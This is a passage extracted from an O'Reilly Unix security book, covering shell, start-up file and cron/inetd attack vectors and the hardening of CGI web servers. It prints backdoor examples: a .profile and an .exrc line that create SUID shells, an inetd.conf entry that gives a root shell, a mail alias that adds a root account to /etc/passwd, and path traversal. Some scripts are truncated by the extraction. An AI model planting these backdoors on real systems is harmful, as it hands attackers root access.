The IFS variable can be set to indicate what characters separate input words (similar to the -F option to awk). The benefit of this<br />

variable is that you can use it to change the behavior of the shell in interesting ways. For example, you could use the following shell<br />

script to get a list of account names and their home directories:<br />

#!/bin/sh<br />

IFS=":"<br />

while read acct passwd uid gid gcos homedir shell<br />

do<br />

echo $acct " " $homedir<br />

done < /etc/passwd<br />

(In the example shown earlier, the shell has already read and parsed the whole file before the assignment to IFS is executed, so the<br />

remaining words are not separated with colon (:) characters.)<br />

The IFS feature has largely been superseded by other tools, such as awk and Perl. However, the feature lives on and can cause<br />

unexpected damage. By setting IFS to use / as a separator, an attacker could cause a shell file or program to execute unexpected<br />

commands, as described in <strong>Sec</strong>tion 5.5.3.2, "Another SUID example: IFS and the /usr/lib/preserve hole".<br />

Most modern versions of the shell will reset their IFS value to a normal set of characters when invoked. Thus, shell files will behave<br />

properly. However, not all do. To determine if your shell is immune to this problem, try executing the following:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_05.htm (2 of 9) [2002-04-12 10:44:16]


[Chapter 11] 11.5 Protecting Yourself<br />

: A test of the shell<br />

cd /tmp<br />

cat > tmp


[Chapter 11] 11.5 Protecting Yourself<br />

described in this section.<br />

Example 11.1: Command Test Script<br />

: A Test of three basic commands<br />

cd /tmp<br />

if test -f ./gotcha<br />

then<br />

echo "Ooops! There is already a file named gotcha here."<br />

echo "Delete it and try again."<br />

exit 1<br />

fi<br />

cat > gotcha /dev/null<br />

if test -f ./g$$<br />

then<br />

echo "Ooops! find gotcha!"<br />

rm -f g$$<br />

else<br />

echo "find okay"<br />

fi<br />

ls -1 * | sed 's/^/wc /' | sh >/dev/null<br />

if test -f ./g$$<br />

then<br />

echo "Ooops! your shell gotcha!"<br />

rm -f g$$<br />

else<br />

echo "your shell okay"<br />

fi<br />

ls -1 | xargs ls >/dev/null<br />

if test -f ./g$$<br />

then<br />

echo "Ooops! xargs gotcha!"<br />

rm -f g$$<br />

else<br />

echo "xargs okay"<br />

fi<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_05.htm (4 of 9) [2002-04-12 10:44:16]


[Chapter 11] 11.5 Protecting Yourself<br />

rm -f ./gotcha "$fname" g$$<br />

11.5.2 Start-up File Attacks<br />

Various programs have methods of automatic initialization to set options and variables for the user. Once set, the user normally never<br />

looks at these again. As a result, they are a great spot for an attacker to make a hidden change to be executed automatically on her<br />

behalf.<br />

The problem is not that these start-up files exist, but that an attacker may be able to write to them. All start-up files should be<br />

protected so only the file's owner can write to them. Even having group-write permission on these files may be dangerous.<br />

11.5.2.1 .login, .profile, /etc/profile<br />

These files are executed when the user first logs in. Commands within the files are executed by the user's shell. Allowing an attacker<br />

to write to these files can result in arbitrary commands being executed each time the user logs in, or on a one-time basis (and hidden):<br />

: attacker's version of root's .profile file<br />

/bin/cp /bin/sh /tmp/.secret<br />

/etc/chown root /tmp/.secret<br />

/bin/chmod 4555 /tmp/.secret<br />

: run real .profile and replace this file<br />

mv /.real_profile /.profile<br />

. /.profile<br />

11.5.2.2 .cshrc, .kshrc<br />

These are files that can be executed at login or when a new shell is run. They may also be run after executing su to the user account.<br />

11.5.2.3 GNU .emacs<br />

This file is read and executed when the GNU Emacs editor is started. Commands of arbitrary nature may be written in Emacs LISP<br />

code and buried within the user's Emacs start-up commands. Furthermore, if any of the directories listed in the load-path variable are<br />

writable, the library modules can be modified with similar results.<br />

11.5.2.4 .exrc<br />

This file is read for initialization when the ex or vi editor is started. What is particularly nasty is that if there is a version of this file<br />

present in the current directory, then its contents may be read in and used in preference to the one in the user's home directory.<br />

Thus, an attacker might do the following in every directory where he has write access:<br />

% cat > .exrc<br />

!(cp /bin/sh /tmp/.secret;chmod 4755 /tmp/.secret)&<br />

^D<br />

Should the superuser ever start either the vi or ex editor in one of those directories, the superuser will unintentionally create an SUID<br />

sh. The superuser will notice a momentary display of the ! symbol during editor start-up. The attacker can then, at a later point,<br />

recover this SUID file and take full advantage of the system.<br />

Some versions of the vi/ex software allow you to put the command set noexrc in your EXINIT environment variable. This ability<br />

prevents any local .exrc file from being read and executed.<br />

11.5.2.5 .forward, .procmailrc<br />

Some mailers allow the user to specify special handling of mail by placing special files in their home directory. With sendmail, the<br />

user may specify certain addresses and programs in the .forward file. If an attacker can write to this file, she can specify that upon<br />

mail receipt a certain program be run - like a shell script in /tmp that creates a SUID shell for the attacker.<br />

Many popular mailer packages allow users to write filter files to process their mail in a semi-automated fashion. This includes the<br />

procmail system, MH, elm, and several others. Some of these programs are quite powerful, and have the potential to cause problems<br />

on your system. If a user writes a filter to trigger on a particular form of mail coming into the mailbox, an attacker could craft a<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_05.htm (5 of 9) [2002-04-12 10:44:16]


message to cause unwarranted behavior.<br />

For example, suppose that one of your users has installed an autoreply to send an "out-of-the-office" reply to any incoming mail. If<br />

someone with malicious intent were to send a forged mail message with a bad return address, the hapless user's mailer would send an<br />

automated reply. However, the bad address would cause a bounce message to come back, only to trigger another autoreply. The<br />

result is an endless exchange of autoreplies and error messages, tying up network bandwidth (if non-local), log file space, and disk<br />

space for the user. (The solution is to use an autoreply that either sends a reply to each address only once every few days, and that<br />

recognizes error messages. Unfortunately, novice users, by definition, seldom think about how what they write can go wrong.)<br />

11.5.2.6 Other files<br />

Other programs also have initialization files that can be abused. Third-party systems that you install on your system, such as database<br />

systems, office interfaces, and windowing systems, all may have initialization files that can cause problems if they are configured<br />

incorrectly or are writable. You should carefully examine any initialization files present on your system, and especially check their<br />

permissions.<br />

11.5.2.7 Other initializations<br />

Many programs allow you to set initialization values in environment variables in your shell rather than in your files. These can also<br />

cause difficulties if they are manipulated maliciously. For instance, in the above example for vi, the Trojan horse can be planted in<br />

the EXINIT environment variable rather than in a file. The attacker then needs to trick the superuser into somehow sourcing a file or<br />

executing a shell file that sets the environment variable and then executes the editor. Be very wary of any circumstances where you<br />

might alter one of your shell variables in this way!<br />

Another possible source of initialization errors comes into play when you edit files that have embedded edit commands. Both vi/ex<br />

and Emacs allow you to embed editor commands within text files so they are automatically executed whenever you edit the file. For<br />

this to work, they must be located in the first few or last few lines of the file.<br />

To disable this feature in Emacs, place one of these lines in your .emacs file:<br />

(setq inhibit-local-variables t)<br />

; emacs version 18<br />

or:<br />

[Chapter 11] 11.5 Protecting Yourself<br />

(setq enable-local-variables "ask")<br />

; emacs verison 19 and above<br />

We know of no uniform method of disabling the undesired behavior of vi/ex on every platform without making alterations to the<br />

source. Some vendors may have provided a means of shutting off this automatic initialization, so check your documentation.<br />

11.5.3 Abusing Automatic Mechanisms<br />

<strong>UNIX</strong> has programs and systems that run automatically. Many of these systems require special privileges. If an attacker can<br />

compromise these systems, he may be able to gain direct unauthorized access to other parts of the operating system, or to plant a<br />

back door to gain access at a later time.<br />

In general, there are three principles to preventing abuse of these automatic systems:<br />

1.<br />

2.<br />

3.<br />

Don't run anything in the background or periodically with any more privileges than absolutely necessary.<br />

Don't have configuration files for these systems writable by anyone other than the superuser. Consider making them<br />

unreadable, too.<br />

When adding anything new to the system that will be run automatically, keep it simple and test it as thoroughly as you can.<br />

The first principle suggests that if you can run something in the background with a user ID other than root, you should do so. For<br />

instance, the uucp and Usenet cleanup scripts that are usually executed on a nightly basis should be run from the uucp and news<br />

UIDs, rather than as the superuser. Those shell files and their directories should all be protected so that they are unwritable by other<br />

users. In this way, an attacker can't modify the files and insert commands that will be automatically executed at a later time.<br />

11.5.3.1 crontab entries<br />

There are three forms of crontab files. The oldest form has a line with a command to be executed as superuser whenever the time<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_05.htm (6 of 9) [2002-04-12 10:44:16]


field is matched by the cron daemon.[7] To execute commands from this old-style crontab file as a user other than root, it is<br />

necessary to make the command listed in the crontab file use the su command. For example:<br />

[7] All crontab files are structured with five fields (minutes, hours, days, months, day of week) indicating the time at<br />

which to run the command.<br />

59 1 * * * su news -c /usr/lib/news/news.daily<br />

This has the effect of running the su command at 1:59 a.m., resulting in a shell running as user news. The shell is given arguments of<br />

both -c and /usr/lib/news/news.daily that then cause the script to be run as a command.<br />

The second form of the cron file has an extra field that indicates on whose behalf the command is being run. Below, the script is run<br />

at 1:59 a.m. as user news without the need for a su command. This version of cron is found principally in versions of <strong>UNIX</strong> derived<br />

from the older BSD version:<br />

59 1 * * * news<br />

/usr/lib/news/news.daily<br />

The third form of cron is found in System V systems, and later versions of BSD-derived <strong>UNIX</strong>. It keeps a protected directory with a<br />

separate crontab file for each user. The cron daemon examines all the files and dispatches jobs based on the user owning the file.<br />

This form of cron does not need any special care in the entries, although (like the other two versions) the files and directories need to<br />

be kept protected.<br />

A freely redistributable version of cron that has this third type of behavior is available on many FTP sites (be sure to get the latest<br />

version). It was written by Paul Vixie and is available for anyone who wants to use it for noncommercial purposes. If you are stuck<br />

with the oldest form of cron, we suggest that you consider obtaining Paul's version to replace yours.<br />

11.5.3.2 inetd.conf<br />

The /etc/inetd.conf file defines what programs should be run when incoming network connections are caught by the inetd daemon.<br />

An intruder who can write to the file may change one of the entries in the file to start up a shell or other program to access the system<br />

upon receipt of a message. So, he might change:<br />

daytime stream tcp nowait root internal<br />

to:<br />

[Chapter 11] 11.5 Protecting Yourself<br />

daytime stream tcp nowait root /bin/ksh ksh -i<br />

This would allow an attacker to telnet to the daytime port on the machine, and get a root shell any time he wanted to get back on the<br />

machine. Note that this would not result in any unusual program appearing on the system. The only way to discover this trap is to<br />

include the inetd.conf file. Obviously, this is a file to include as part of the checklists procedure for examining altered files. It is also a<br />

file that should be closely guarded.<br />

Note that even if the command names look appropriate for each of the services listed in the inetd.conf file, if the corresponding files<br />

are writable or in a writable directory, the attacker may replace them with altered versions. They would not need to be SUID/SGID<br />

because the inetd would run them as root (if so indicated in the file).<br />

11.5.3.3 /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or aliases.pag<br />

This is the file of system-wide electronic mail aliases used by the sendmail program. Similar files exist for other mailers.<br />

The danger with this file is that an attacker can create a mail alias that automatically runs a particular program. For example, an<br />

attacker might add an alias that looks like this:<br />

uucheck: "|/usr/lib/uucp/local_uucheck"<br />

He might then create a SUID root file called /usr/lib/uucp/local_uucheck that essentially performs these operations:[8]<br />

[8] An actual attacker would make local_uucheck a compiled program to hide its obvious effect.<br />

#!/bin/sh<br />

echo "uucheck::0:0:fake uucp:/:/bin/sh" >> /etc/passwd<br />

The attacker now has a back door into the system. Whenever he sends mail to user uucheck, the system will put an entry into the<br />

password file that will allow the attacker to log in. He can then edit the entry out of the password file, and have free reign on the<br />

system. How often do you examine your alias file?<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_05.htm (7 of 9) [2002-04-12 10:44:16]


[Chapter 11] 11.5 Protecting Yourself<br />

There are other ways of exploiting email programs that do not require the creation of SUID programs. We have omitted them from<br />

this text for safety, as an astonishingly large number of sites have world-writable alias files.<br />

Be sure that your alias file is not writable by users (if for no other reason than the fact that it gives users an easy way to intercept<br />

your mail). Make certain that no alias runs a program or writes to a file unless you are absolutely 100% certain what the program<br />

does.<br />

11.5.3.4 The at program<br />

Most <strong>UNIX</strong> systems have a program called at that allows users to specify commands to be run at a later time. This program is<br />

especially useful for jobs that only need to be run once, although it is also useful on systems that do not have a modern version of<br />

cron that allows users to set their own delayed jobs.<br />

The at command collects environment information and commands from the user and stores them in a file for later execution. The user<br />

ID to be used for the script is taken from the queued file. If an attacker can get into the queue directory to modify the file owner or<br />

contents, it is possible that the files can be subverted to do something other than what was intended. Thus, for obvious reasons, the<br />

directory where at stores its files should not be writable by others, and the files it creates should not be writable (or readable) by<br />

others.<br />

Try running at on your system. If the resulting queue files (usually in /usr/spool/atrun, /usr/spool/at, or /var/spool/atrun) can be<br />

modified by another user, you should fix the situation or consider disabling the atrun daemon (usually dispatched by cron every 15<br />

minutes).<br />

11.5.3.5 System initialization files<br />

The system initialization files are another ideal place for an attacker to place commands that will allow access to the system. By<br />

putting selected commands in the /etc/rc*, /etc/init.d/*, /etc/rc?.d, and other standard files, an attacker could reconstruct a back door<br />

into the system whenever the system is rebooted or the run-level is changed. All the files in /etc should be kept unwritable by other<br />

users!<br />

Be especially careful regarding the log files created by programs automatically run during system initialization. These files can be<br />

used to overwrite system files through the use of symlinks.<br />

11.5.3.6 Other files<br />

Other files may be run on a regular basis, and these should be protected in a similar manner. The programs and data files should be<br />

made nonwritable (and perhaps nonreadable) by unprivileged users. All the directories containing these files and commands up to<br />

and including the root directory should be made nonwritable.<br />

As an added precaution, none of these files or directories (or the ones mentioned earlier) should be exported via NFS (described in<br />

Chapter 20, NFS). If you must export the files via NFS, export them read-only, and/or set their ownership to root.<br />

Note that this presents a possible contradiction: setting files to root that don't need to be set to root to run. For instance, if you export<br />

the UUCP library via NFS, you would need to set the files and directory to be owned by root to prevent their modification by an<br />

attacker who has subverted one of your NFS hosts. At the same time, that means that the shell files may be forced to run as root<br />

instead of as uucp - otherwise, they won't be able to modify some of the files they need to alter!<br />

In circumstances such as these, you should export the directories read-only and leave the files owned by uucp. If there is any reason<br />

at all to have writable files or subdirectories in what you export,[9] use symbolic links to keep a separate copy on each system. For<br />

instance, you could replace a file in the exported directory via a link to /local/uucp or /var/uucp and create a local version on each<br />

machine.<br />

[9] No obvious example comes to mind. We recommend against thinking of any!<br />

Other files and directories to protect include:<br />

●<br />

●<br />

●<br />

●<br />

The NIS/NIS+ database and commands (often in /usr/etc/yp or /var/nis)<br />

The files in /usr/adm, /var/adm, and /or /var/log used for accounting and logging<br />

The files in your mailer queue and delivery area (usually /usr/spool/mqueue and /usr/spool/mail or linked to those names)<br />

All the files in the libraries (/lib, /usr/lib, and /usr/local/lib)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_05.htm (8 of 9) [2002-04-12 10:44:16]


[Chapter 11] 11.5 Protecting Yourself<br />

No files that are used as part of your system's start-up procedure or for other automatic operations should be exported via NFS. If<br />

these files must be exported using NFS, they should be set on the server to be owned by root and placed in a directory that is owned<br />

by root. Do not export files or directories for UUCP or other subsystems that require ownership by users other than root.<br />

11.4 Entry 11.6 Protecting Your System<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_05.htm (9 of 9) [2002-04-12 10:44:16]


[Chapter 18] 18.2 Running a <strong>Sec</strong>ure Server<br />

Chapter 18<br />

WWW <strong>Sec</strong>urity<br />

18.2 Running a <strong>Sec</strong>ure Server<br />

Web servers are designed to receive anonymous requests from unauthenticated hosts on the <strong>Internet</strong> and to<br />

deliver the requested information in a quick and efficient manner. As such, they provide a portal into your<br />

computer that can be used by friend and foe alike.<br />

No piece of software is without its risk. Web servers, by their nature, are complicated programs. Furthermore,<br />

many organizations use Web servers with source code that is freely available over the <strong>Internet</strong>. Although this<br />

means that the source code is available for inspection by the organization, it also means that an attacker can<br />

scan that same source code and look for vulnerabilities.<br />

The ability to add functions to a Web server through the use of CGI scripts tremendously complicates their<br />

security. While a CGI script can add new features to a Web server, it can also introduce security problems of<br />

its own. For example, a Web server may be configured so that it can only access files stored in a particular<br />

directory on your computer, but a user may innocently install a CGI script that allows outsiders to read any file<br />

on your computer. Furthermore, because many users do not have experience in writing secure programs, it is<br />

possible (and likely) that locally written CGI scripts will contain bugs allowing an outsider to execute arbitrary<br />

commands on your system. Indeed, several books that have been published on CGI programming have<br />

included such flaws.<br />

Because of the richness of its tools, the plethora of programming languages, and the ability of multiple users to<br />

be logged in at the same time from remote sites over a network, the <strong>UNIX</strong> operating system is a remarkably<br />

bad choice for running secure Web servers. Because many PC-based operating systems share many of these<br />

characteristics, they are also not very good choices. Experience has shown that the most secure Web server is a<br />

computer that runs a Web server and no other applications, that does not have a readily accessible scripting<br />

language, and that does not support remote logins. In practice, this describes an Apple Macintosh computer<br />

running MacHTTP, WebStar, or a similar Web server. According to recent surveys, such computers comprise<br />

as many as 15% of the Web servers on the <strong>Internet</strong>.<br />

Of course, there are many advantages to running a Web server on a <strong>UNIX</strong> computer instead of a Macintosh.<br />

<strong>UNIX</strong> generally runs faster than MacOS on comparable hardware, and <strong>UNIX</strong> is available for hardware<br />

platforms that run faster than PowerPC-based computers. Furthermore, it is generally easier for organizations<br />

to integrate <strong>UNIX</strong>-based Web servers with their existing information infrastructure, creating interesting<br />

possibilities for Web offerings. Finally, more MIS professionals have familiarity with building <strong>UNIX</strong>-based<br />

<strong>Internet</strong> servers than with building MacOS-based ones. Nonetheless, we suggest that the security-conscious<br />

administrator give the Mac-based approach serious thought.<br />

To build a secure Web server on any platform, you must be able to assure a variety of things, including:<br />

●<br />

Network users must never be able to execute arbitrary programs or shell commands on your server.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_02.htm (1 of 9) [2002-04-12 10:44:17]


[Chapter 18] 18.2 Running a <strong>Sec</strong>ure Server<br />

●<br />

●<br />

CGI scripts that run on your server must perform either the expected function or return an error message.<br />

Scripts should expect and be able to handle any maliciously tailored input.<br />

In the event that your server is compromised, an attacker should not be able to use it for further attacks<br />

against your organization.<br />

The following sections explore a variety of techniques for dealing with these issues.<br />

18.2.1 The Server's UID<br />

Most Web servers are designed to be started by the superuser. The server needs to be run as root so it can listen<br />

to requests on port 80, the standard HTTP port.<br />

Once the server starts running, it changes its UID to the username that is specified in a configuration file. In<br />

the case of the NCSA server, this configuration file is called conf/httpd.conf. In the file, there are three lines<br />

that read:<br />

# User/Group: The name (or #number) of the user/group to run httpd as.<br />

User http<br />

Group http<br />

This username should not be root. Instead, the user and group should specify a user that has no special access<br />

on your server.<br />

In the example above, the user changes his UID to the http user before accessing files or running CGI scripts.<br />

If you have a CGI script that is to be run as superuser (and you should think very carefully about doing so), it<br />

must be SUID root. Before you write such a script, carefully read Chapter 23.<br />

NOTE: Do not run your server as root! Although your server must be started by root, the<br />

http.conf file must not contain the line "User root". If it does, then every script that your Web<br />

server executes will be run as superuser, creating many potential problems.<br />

18.2.2 Understand Your Server's Directory Structure<br />

Web servers are complicated pieces of software. They use many files in many directories. The contents of<br />

some directories are made available over the network. The contents of other directories must not be made<br />

available over the network, and, for safety, should not be readable by users on your system. To run a secure<br />

server, you must understand the purpose of each directory, and the necessary protections that it must have.<br />

The NCSA sever has six directories:<br />

Directory Purpose<br />

cgi-bin Holds CGI scripts<br />

conf Holds server configuration files<br />

htdocs Holds Web documents<br />

icons Holds Web documents<br />

logs Records server activity<br />

support Holds supplemental programs for the server<br />

Many sources recommend creating a user called www and a group called www which can be used by the Web<br />

administrator to administrate the Web server:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_02.htm (2 of 9) [2002-04-12 10:44:17]


[Chapter 18] 18.2 Running a <strong>Sec</strong>ure Server<br />

drwxr-xr-x 5 www www 1024 Aug 8 00:01 cgi-bin/<br />

drwxr-x--- 2 www www 1024 Jun 11 17:21 conf/<br />

-rwx------ 1 www www 109674 May 8 23:58 httpd<br />

drwxrwxr-x 2 www www 1024 Aug 8 00:01 htdocs/<br />

drwxrwxr-x 2 www www 1024 Jun 3 21:15 icons/<br />

drwxr-x--- 2 www www 1024 May 4 22:23 logs/<br />

This is an interesting approach, but we don't think that it adds much in the way of security. Because the httpd<br />

program is run as root, anybody who has the ability to modify this program has the ability to become the<br />

superuser. This is a particular vulnerability if you should ever move the server or configuration files onto an<br />

NFS-exported partition. Therefore, we recommend acknowledging this fact, and setting up your Web server<br />

directory with root ownership:<br />

drwx--x--x 8 root www 1024 Nov 23 09:25 cgi-bin/<br />

drwx------ 2 root www 1024 Nov 26 11:00 conf/<br />

drwxr-xr-x 2 root www 1024 Dec 7 18:22 htdocs/<br />

-rwx------ 1 root www 482168 Aug 6 00:29 httpd*<br />

drwxrwxr-x 2 root www 1024 Dec 1 18:15 icons/<br />

drwx------ 2 root www 1024 Nov 25 16:18 logs/<br />

drwxr-xr-x 2 root www 1024 Aug 6 00:31 support/<br />

Notice that the cgi-bin directory has access mode 711; this allows the httpd server to run programs that it<br />

contains, but it doesn't allow a person on the server to view the contents of the directory. More restrictions<br />

make probing for vulnerabilities more difficult.<br />

18.2.2.1 Configuration files<br />

Inside the conf directory, the NCSA server has the following files:<br />

File Purpose<br />

access.conf Controls access to the server's files.<br />

httpd.conf Configuration file for the server.<br />

mime.types Determines the mapping of file extensions to MIME file types.<br />

srm.conf Server Resource Map. This file contains more server configuration information. It determines the<br />

document root, whether or not users can have their own Web directories, the icon that is used for<br />

directory listings, the location of your CGI script directory, document redirections, and error<br />

messages.<br />

Because the information in these files can be used to subvert your server or your entire system, you should<br />

protect the scripts so they can only be read and modified by the superuser:<br />

-rw------- 1 root wheel 954 Aug 6 01:00 access.conf<br />

-rw------- 1 root wheel 2840 Aug 6 01:05 httpd.conf<br />

-rw------- 1 root wheel 3290 Aug 6 00:30 mime.types<br />

-rw------- 1 root wheel 4106 Nov 26 11:00 srm.conf<br />

18.2.2.2 Additional configuration issues<br />

Besides the setting of permissions, you may wish to enable or disable the following configuration options:<br />

Automatic directory listings<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_02.htm (3 of 9) [2002-04-12 10:44:17]


[Chapter 18] 18.2 Running a <strong>Sec</strong>ure Server<br />

Most Web servers will automatically list the contents of a directory if a file called index.html is not<br />

present in directory. This feature can cause security problems, however, as it gives outsiders the ability<br />

to scan for files and vulnerabilities on your system.<br />

Symbolic-link following<br />

Some servers allow you to follow symbolic links outside of the Web server's document tree. This allows<br />

somebody who has access to your Web server's tree to make other documents on your computer<br />

available for Web access. You may not want people to be able to do this, so don't enable the following<br />

of symbolic links. Alternatively, you may wish to set your Web server's symlinks "If Owner Match"<br />

option, so that links are followed only if the owner of the link matches the owner of the file that it points<br />

to.<br />

Server-side includes<br />

Server-side includes are directives that can be embedded in an HTML document. The includes are<br />

processed by the HTML server before the document is sent to a requesting client. Server-side includes<br />

can be used to include other documents or to execute documents, and output the result.<br />

Here are two sample server-side includes that demonstrate why their use is a bad idea:<br />


[Chapter 18] 18.2 Running a <strong>Sec</strong>ure Server<br />

CGI scripts.<br />

In addition to the information that we describe in that chapter, there are additional issues in writing programs<br />

for the World Wide Web.<br />

Most security holes are not intentional. Nonetheless, the more people who have the ability to write scripts on<br />

your Web server, the greater the chance that one of those scripts will contain a significant flaw.<br />

●<br />

Do not allow users to place scripts on your server unless a qualified security professional has personally<br />

read through the scripts and assured you of their safety.<br />

18.2.3.1 Do not trust the user's browser!<br />

HTML includes the ability to display selection lists, limit the length of fields to a certain number of characters,<br />

embed hidden data within forms, and specify variables that should be provided to CGI scripts. Nevertheless,<br />

you cannot make your CGI script depend on any of these restrictions. That is because any CGI script can be<br />

run by directly requesting the script's URL; attackers do not need to go through your form or use the interface<br />

that you provide.<br />

Be especially careful of the following:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

If you create a selection list, the value that is returned for the input field will not necessarily match the<br />

allowable values that you have defined.<br />

If you specify a maximum length for a variable, the length of the variable that is provided to your script<br />

may be significantly longer. (What would your script do if provided with a username that is 4000<br />

characters long?)<br />

Variables that are provided to your script may have names not defined in your script.<br />

The values for variables that are provided may contain special characters.<br />

The user may view data that is marked as "hidden."<br />

If you use cookies or special hidden tags to maintain state on your server, your script may receive<br />

cookies or tags that it never created.<br />

Attackers are by definition malicious. They do not follow the rules. Never trust anything that is provided over<br />

the network.<br />

18.2.3.2 Testing is not enough!<br />

One of the reasons that it is surprisingly easy to create an unsecure CGI script is that it is very difficult to test<br />

your scripts against the wide variety of HTTP clients available. For example, most client programs will<br />

"escape," or specially encode, characters such as the backquote (`), which are specially interpreted by the<br />

<strong>UNIX</strong> shell. As a result, many CGI programmers do not expect the unencoded characters to be present in the<br />

input stream for their applications, and they do not protect their scripts against the possibility that the<br />

characters are present. Nevertheless, it is easy for the characters to be in the input stream, either as the result of<br />

a bug in a particular Web browser or, more likely, because a malicious attacker is attempting to subvert your<br />

CGI script and gain control of your server.<br />

●<br />

Check all values that are provided to your program for special characters and appropriate length.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_02.htm (5 of 9) [2002-04-12 10:44:17]


[Chapter 18] 18.2 Running a <strong>Sec</strong>ure Server<br />

By all values, we mean all values. This includes the contents of environment variables, host addresses, host<br />

names, URLS, user-supplied data, values chosen from selection lists, and even data that your script has<br />

inserted onto a WWW form through the use of the hidden data type.<br />

Consider the case of a CGI script that creates a series of log files for each host that contacts your WWW<br />

server. The name of the log file might be the following: logfile/{hostname}. What will this program do if it is<br />

contacted by the "host" ../../../../etc/passwd.company.com? Such a script, if improperly constructed, could end<br />

up appending a line to a system's /etc/passwd file. This could then be used as a way of creating unauthorized<br />

accounts on the system.<br />

●<br />

Beware of system( ), popen ( ), pipes, backquotes (`), and Perl's eval ( ) function.<br />

Many programming languages, including C, ksh, sh, csh, and Perl, provide the means to spawn subprocesses.<br />

You should try to avoid using these features when writing CGI scripts. If you must spawn a subprocess, avoid<br />

passing through any strings that are provided by the user. If you must pass strings from the user to the<br />

subprocess, be sure that it does not pass shell meta characters including the `$|;>* characters.<br />

It is generally better to specify a list of allowable characters than to specify a list of dangerous characters. If<br />

you forget to specify an allowable character, there is no real harm done. But if you forget to specify a<br />

dangerous character, such as a backquote, you can compromise the security of your entire system.<br />

18.2.3.3 Sending mail<br />

If you are writing a CGI script that allows a user to send mail, use the /usr/lib/sendmail program to send the<br />

mail, rather than /bin/mailx or /usr/ucb/mail. The reason is that /usr/lib/sendmail does not have shell escapes,<br />

whereas the other mailers do.<br />

Here is a bit of Perl that you can use to send mail securely. It bypasses the shell by using exec ( ) with a fixed<br />

string to run /usr/lib/sendmaildirectly:<br />

open (WRITE, "|-")<br />

|| exec ("usr/lib/sendmail", "-oi," "-t")<br />

|| die "Can't fork$!\n":<br />

print WRITE "To: $address\n";<br />

print WRITE "Subject: $subject\n";<br />

print WRITE "From: $sender\n";<br />

print WRITE "\n$message\n.\n";<br />

close(WRITE);<br />

There are many commands in Perl that will run the shell, possibly without your knowledge. These include<br />

system ( ), eval ( ), pipes, backquotes, and, occasionally, exec ( ) (if shell meta characters are present on the<br />

command line).<br />

18.2.3.4 Tainting with Perl<br />

If you are using the Perl programming language, you can use Perl's "tainting" facility to track information that<br />

has been provided by the user. Perl marks such information as "tainted." The only way to untaint information<br />

is to match it using a Perl regular expression, and then to copy out the matched values using Perl's string match<br />

variables.<br />

For example, if you have a name that has been provided by the user, you can untaint the value to be sure that it<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_02.htm (6 of 9) [2002-04-12 10:44:17]


[Chapter 18] 18.2 Running a <strong>Sec</strong>ure Server<br />

only contains letters, numbers, commas, spaces, and periods by using the following Perl statements:<br />

$tainted_username =~ m/([a-zA-Z. ]*)/;<br />

$untainted_username = $1;<br />

You can use the following to extract an email address:<br />

$tainted_email =~ /([\w-.%]+\@[\w.-]+)/;<br />

$untainted_email = $1;<br />

There are two ways to enable tainting. If you are using Perl 4, you should invoke the taintperl command<br />

instead of the Perl command, by placing the following statement (or something similar) at the beginning of<br />

your file:<br />

#!/usr/local/bin/taintperl<br />

If you are using Perl version 5, you accomplish the same result by using the -T flag:<br />

#!/usr/local/bin/perl -T<br />

18.2.3.5 Beware stray CGI scripts<br />

Most Web servers can be configured so that all CGI scripts must be confined to a single directory. We<br />

recommend this configuration, because it makes it easier for you to find and examine all of the CGI scripts on<br />

your system. We do not recommend the practice of allowing any file on the Web server with the extension<br />

".cgi" to be run as a CGI script.<br />

Instead, we recommend that you:<br />

●<br />

●<br />

●<br />

●<br />

Configure your Web server so that all CGI scripts must be placed in a single directory (typically, the<br />

directory is called cgi-bin).<br />

Use a program such as Tripwire (see Chapter 9, Integrity Management) to monitor for unauthorized<br />

changes to these scripts.<br />

Allow limited access to this directory and its contents. Local users should not be allowed to install or<br />

remove scripts, or to edit existing scripts without administrative review. You also may want to prevent<br />

these scripts from being read, to prevent someone from snooping.<br />

Remove the backup files that are automatically generated by your editor. Many system administrators<br />

use text editors such as Emacs to edit scripts that are in place on the running server. Frequently, this<br />

leaves behind backup files, with names such as start~ or create-account~. These backup files can be<br />

executed an attacker, usually with unwanted results.<br />

18.2.4 Keep Your Scripts <strong>Sec</strong>ret!<br />

Throughout this book, we have railed against the practice of security through obscurity - the practice of basing<br />

some of the security of your system upon undocumented aspects. Nevertheless, the fact remains that the ready<br />

availability of <strong>UNIX</strong> source code, as opposed to the relative "obscurity" of the source code for other operating<br />

systems such as VMS or Windows/NT, means that potential attackers can search through the operating system<br />

looking for avenues of attack, and then craft their attacks in such a way as to guarantee the maximum possible<br />

access. One good way to prevent these sorts of attacks is to limit the access to source code.<br />

Because it is so easy to make a mistake when writing a CGI program, it behooves sites to keep your CGI<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_02.htm (7 of 9) [2002-04-12 10:44:17]


[Chapter 18] 18.2 Running a <strong>Sec</strong>ure Server<br />

scripts and programs confidential. This does not guarantee security for buggy scripts: a determined attacker<br />

can still probe and, frequently, find flaws with your system. However, it does significantly increase the work<br />

that is involved. Determined attackers will still get through, but casual attackers may move on to other, more<br />

inviting systems.<br />

●<br />

Prevent network users from reading the contents of your CGI scripts. This will help keep an attacker<br />

